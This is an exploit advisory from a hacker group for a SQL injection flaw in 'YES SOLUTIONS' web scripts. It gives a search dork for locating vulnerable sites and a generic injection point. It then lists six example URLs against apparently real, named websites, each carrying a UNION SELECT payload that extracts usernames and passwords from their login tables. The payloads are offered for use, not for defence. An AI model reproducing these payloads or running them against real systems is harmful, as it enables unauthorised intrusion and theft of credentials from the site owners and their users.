#################################################################### .:. Author : HackXBack [h-b@usa.com] Lebanese Hacker .:. Team : Sec Attack Team .:. Home : www.sec-attack.com/vb .:. Script : YES SOLUTIONS .:. Bug Type : Sql Injection .:. Dork : "Powered by: Yes Solutions" #################################################################### ===[ Exploit ]=== http://server/path/file.php?id=null[SQL] ===[ Example ]=== http://www.bitmu.com/files/services.php?id=-34%20union%20select%201,2,concat%28login,0x3a,password%29,4,5,6+from+login_table+where%20login_id=1 http://www.efois.com/latest_news.php?id=-3%20union%20select%201,group_concat%28username,0x3a,password%29,3,4,5,6,7,8+from+login http://www.skincarenwellness.com/files/company.php?cat_id=-2%20union%20select%201,group_concat%28Login_Name,0x3a,Password%29,3,4,5,6,7,8+from+login_table http://www.skbl.biz/files/product_detail.php?item_id=-122%20union%20select%201,2,3,group_concat%28Login_Name,0x3a,Password%29,5,6,7,8,9+from+login_table http://www.autopalaceltd.com/files/product.php?cat_id=-29 union select 1,group_concat(login,0x3a,password),3,4,5,6,7+from+login_table http://www.forexdirectmauritius.com/files/detail.php?id=34&page_id=-3%20union%20select%201,group_concat%28login,0x3a,password%29,3,4,5,6+from+login_table #################################################################### Greats T0: AtT4CKxT3rR0r1ST & All Member Sec Attack